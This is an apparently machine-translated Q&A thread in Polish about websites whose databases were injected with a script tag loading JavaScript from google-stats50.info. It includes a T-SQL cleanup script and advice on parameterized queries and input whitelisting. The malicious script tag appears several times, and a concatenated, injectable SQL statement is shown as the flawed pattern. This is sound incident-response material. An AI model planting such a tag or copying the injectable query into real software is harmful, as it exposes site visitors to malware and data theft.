1. Dom
  2. Pytanie i odpowiedź
  3. Odszyfrowanie tego ataku XSS

Odszyfrowanie tego ataku XSS

2010-09-21 22 views
9

Czy ktoś wie więcej informacji na temat tego ataku?Odszyfrowanie tego ataku XSS

Niedawno dostałem ten skrypt wstrzykiwany w moich stronach internetowych

Przy okazji dont go na tej stronie internetowej, ponieważ jest źródłem zakażenia

</title><script src=http://google-stats50.**fo/***.php>

Jaki rodzaj ataku jest to, SQL lub CODE?

Nawiasem mówiąc nie idź na tej stronie, ponieważ jest źródłem zakażenia

Pytanie brzmi, co quind ataku wystąpi ten zakaźny atak?

Znaleźliśmy go i nie był podobny do ataku twitter, to było przez parametry żądania w url i wstrzyknąć sql bezpośrednio w parametrze.

Istnieje skrypt SQL wytwarzać przez nasz zespół sql do czyszczenia bazy danych, który został zainfekowany

/************************************************************************* 
     SQL INJECTED DATABASE 
*************************************************************************/ 

DECLARE @dbName VARCHAR(200), 
     @SqlString NVARCHAR(MAX), 
     @SearchText VARCHAR(MAX), 
     @SearchTextLike VARCHAR(MAX), 
     @NbItems INT, 
     @TableName VARCHAR(255), 
     @ColoneName VARCHAR(255), 
     @objId BIGINT, 
     @tmpSqlString NVARCHAR(MAX), 
     @CleanUp BIT, 
     @RowCount BIGINT, 
     @debug BIT, 
     @Msg VARCHAR(MAX); 

SET @debug = 0; -- 1 = Additionnal prints 

SET @CleanUp = 0; -- 1 = Update tables 

SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>'; 

SET @SearchTextLike = '%' + @SearchText + '%'; 

DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255)); 
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255)); 
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX)); 
DECLARE @DbToValidate TABLE (DbName VARCHAR(255)); 

INSERT INTO @DbToValidate 
SELECT Name 
FROM sys.databases 
WHERE [state] = 0 AND 
     Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND 
     Name NOT LIKE 'sys%' 
ORDER BY Name; 

DECLARE db_cusor CURSOR FOR 
SELECT DbName 
FROM @DbToValidate; 

OPEN db_cusor; 

FETCH NEXT FROM db_cusor 
INTO @dbName; 

WHILE @@FETCH_STATUS = 0 
BEGIN 
    SET @Msg = 'Traitement pour : ' + @dbName; 
    INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); 
    PRINT @Msg; 

    IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0 
    BEGIN 
     IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName; 

     --Vider le contenu 
     DELETE FROM @QueryResults; 

     IF @debug = 1 PRINT '2 - Vider la table @QueryResults'; 

     IF @CleanUp = 0 
     BEGIN 
      SET @SqlString = ' USE [' + @dbName + '];' + 
          ' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' + 
          ' FROM sys.tables tbl inner join' + 
          '   sys.columns col on tbl.object_id = col.object_id' + 
          ' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''; 
     END 
     ELSE 
     BEGIN 
      SET @SqlString = ' USE [' + @dbName + '];' + 
          ' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' + 
          ' FROM sys.tables tbl inner join' + 
          '   sys.columns col on tbl.object_id = col.object_id' + 
          ' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''' 
     END 

     INSERT INTO @QueryResults     
     EXEC sp_executesql @SqlString; 

     --Validation pour les erreurs 
     IF @@ERROR <> 0 
     BEGIN 
      GOTO NEXTPRINC 
     END 

     IF @debug = 1 PRINT '3 - Récupérer les Query String'; 

     --Faire une loop sur les querys string pour voir s'il y a des injections SQL 
     DECLARE query_cursor CURSOR FOR 
     SELECT SqlString, TableName, ColoneName 
     FROM @QueryResults; 

     OPEN query_cursor; 

     FETCH NEXT FROM query_cursor 
     INTO @SqlString, @TableName, @ColoneName; 

     IF @debug = 1 PRINT '4 - Cursor sur les Query String'; 

     WHILE @@FETCH_STATUS = 0 
     BEGIN 

      SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');' 

      EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output 

      --Validation pour les erreurs 
      IF @@ERROR <> 0 
      BEGIN 
       GOTO NEXTINNER 
      END 

      IF ISNULL(@objId, -1) <> -1 
      BEGIN 

       SET @SqlString = 'USE [' + @dbName + '];' + @SqlString; 

       IF @CleanUp = 0 
       BEGIN 
        EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output 
       END 
       ELSE 
       BEGIN 
        EXEC sp_executesql @SqlString 
        SET @RowCount = @@ROWCOUNT 
       END 

       --Validation pour les erreurs 
       IF @@ERROR <> 0 
       BEGIN 
        GOTO NEXTINNER 
       END 

       IF @CleanUp = 0 
       BEGIN 
        IF ISNULL(@NbItems, 0) <> 0 
        BEGIN 
         -- BD Infectée ! 
         INSERT INTO @InfectedDB VALUES (@dbName); 
         PRINT '**** BD Infectée : ' + @dbName; 
         SELECT * FROM @InfectedDB; 
         BREAK; 
        END 
       END 
       ELSE 
       BEGIN 
        IF @RowCount <> 0 
        BEGIN 
         SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7)); 
         INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); 
         PRINT @Msg; 
        END 
       END 

      END 

    NEXTINNER: 
      -- Get the next query. 
      FETCH NEXT FROM query_cursor 
      INTO @SqlString, @TableName, @ColoneName; 
     END 

     CLOSE query_cursor; 
     DEALLOCATE query_cursor; 

     IF @debug = 1 PRINT '5 - Vider cursor query'; 
    END 
    ELSE 
    BEGIN 
     SET @Msg = '**** La base de données n''est pas ''ONLINE''.'; 
     INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); 
     PRINT @Msg; 
    END 

    SET @Msg = 'Fin traitement pour : ' + @dbName; 
    INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); 
    PRINT @Msg; 

NEXTPRINC: 
    -- Get the next database. 
    FETCH NEXT FROM db_cusor 
    INTO @dbName; 
END 

IF @CleanUp = 0 
BEGIN 
    SELECT * FROM @InfectedDB; 
END 
ELSE 
BEGIN 
    SELECT * FROM @CleanedUpDB; 
END 

GOTO FIN 

FININNER: 
    CLOSE query_cursor; 
    DEALLOCATE query_cursor; 

FIN: 
    --Fermeture du cursor 
    CLOSE db_cusor; 
    DEALLOCATE db_cusor;

Źródło

2010-09-21 Cédric Boivin

+0

Nie wiem, co to jest i jak to naprawić, ale Google pokazuje około 740 innych witryn w podobny sposób zainfekowanych. –

+0

Donc zmienić adres URL skryptu, proszę! –

+3

@ Cédric Proszę mi powiedzieć, dlaczego dobrze jest podać nazwę domeny tej niebezpiecznej witryny na stronie głównej strony internetowej, otrzymując 2,5 miliona wizyt dziennie. Czy próbujesz _promote_ it ?! – badp

Odpowiedz

4

Podobnie stało się z nas. Prawie każdy rekord w bazie danych.

Najlepszym kandydatem jest wykonanie następujących czynności: (mamy tylko zrobić to z powodzeniem)

UPDATE [mytable] set [column] = 
    REPLACE([column], 
      '&lt;/title&gt;&lt;script src=http://google-stats50.info/ur.php&gt;', 
      '')

Linia ta będzie usunąć skrypt z każdego pola. Będziesz musiał ręcznie sprawdzić pola i zmienić instrukcję UPDATE, aby odpowiadała.

Zgaduję, że każdy z was ma formularz na swojej stronie internetowej za pomocą przycisku przesyłania. Zgaduję również, że działanie formularzy obejmuje wyrażenie sql ze sprzężonym sql?

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \ 
          name & "', '" & email & "', '" & enquiry & "');"

Jeśli jest to przypadek, masz SQL injection posiekany i powinieneś zmienić wszystkie oświadczenia, które używają tej składni do „parametryzowane Zapytania”

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);" 

sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo 
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar 
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz

Mam nadzieję, że to pomaga ..

Źródło

2010-09-21 14:26:55 Simon

+0

@badp: Dzięki za sprzątanie :) – Simon

2

Dziś rano mamy ten sam problem. klasyczny przypadek wtrysku sql: nie wydaje się, aby sprawdzić parametry otrzymane przez URL. spójrz na dzienniki dostępu do serwera sieciowego - zobaczysz instrukcje aktualizacji!

Źródło

2010-09-21 14:30:35 Stefan

+0

Dziś rano mamy dokładnie ten sam problem. Niektóre odpowiedzi mówią mi, że nie jestem pewien, czy jest to atak na kod lub atak bezpośrednio na serwer sql, ponieważ witryna .net i strona internetowa asp classic były atakiem –

3

Klasyczny atak XSS. Powinieneś sprawdzić swoje dane wejściowe dla znaczników HTML i je usunąć. Jeśli pozwalasz użytkownikom publikować tagi HTML, powinieneś użyć białej listy dozwolonych tagów (i dozwolonych atrybutów tagów, aby nie mogły na przykład "onClick"), zamiast próbować blokować te, o których możesz pomyśleć, które mogą powodować kłopot.

Źródło

2010-09-21 14:35:36 ishnid

+0

Witryna nie zawiera formularzy –

+0

+1 za polecanie białej listy. –

1

Naprawiłem ostatnio podobny hack, każdy plik .asp, .js i .html na zainfekowanym serwerze zawierał dodatkowy skrypt, ale baza danych była normalna. W tym przypadku hack został wykonany przez FTP, hasło nie było wystarczająco silne. Może stało się coś podobnego do ciebie?

Naprawiłem to za pomocą polecenia znajdź i zamień wszystko w edytorze tekstów obsługującym wiele dokumentów naraz. (notepad ++)

Źródło

2010-09-21 14:48:14 Willem

+0

W moim przypadku baza danych jest zainfekowana, strona jest renderowana z zawartości bazy danych –

Powiązane problemy

 Powiązane problemy